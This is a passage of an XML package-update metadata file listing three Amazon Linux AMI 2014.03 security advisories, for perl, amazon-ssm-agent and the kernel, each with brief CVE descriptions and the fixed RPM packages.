author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1981</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1981: important priority package update for perl</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-40909:
Thread creation while a directory handle is open does a fchdir, affecting other threads (race condition)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-40909" title="" id="CVE-2025-40909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-core" version="5.16.3" release="294.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.45.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.45.amzn1.noarch.rpm</filename></package><package name="perl" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.45.amzn1.noarch.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.45.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.45.amzn1.noarch.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.45.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.45.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.45.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.45.amzn1.noarch.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.45.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.45.amzn1.noarch.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.45.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.45.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.45.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.16.3-294.45.amzn1.i686.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.45.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1982</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1982: important priority package update for amazon-ssm-agent</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-22869:
SSH servers which implement file transfer protocols are vulnerable to a denial of service attack from clients which complete the key exchange slowly, or not at all, causing pending content to be read into memory, but never transmitted.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-22869" title="" id="CVE-2025-22869" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.3.2299.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.3.2299.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2025-1983</id><title>Amazon Linux AMI 2014.03 - ALAS-2025-1983: important priority package update for kernel</title><issued date="2025-06-06 00:29:00" /><updated date="2025-06-06 00:29:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2025-21722:
In the Linux kernel, the following vulnerability has been resolved:
nilfs2: do not force clear folio if buffer is referenced
CVE-2024-58083:
In the Linux kernel, the following vulnerability has been resolved:
KVM: Explicitly verify target vCPU is online in kvm_get_vcpu()
CVE-2024-53173:
In the Linux kernel, the following vulnerability has been resolved:
NFSv4.0: Fix a use-after-free problem in the asynchronous open()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53173" title="" id="CVE-2024-53173" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58083" title="" id="CVE-2024-58083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21722" title="" id="CVE-2025-21722" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.647.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.355-196.647.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.355-196.647.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.355" release="196.647.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.355-196.647.amzn1.i686.rpm</filename></package></collection></pkglist></update></updates>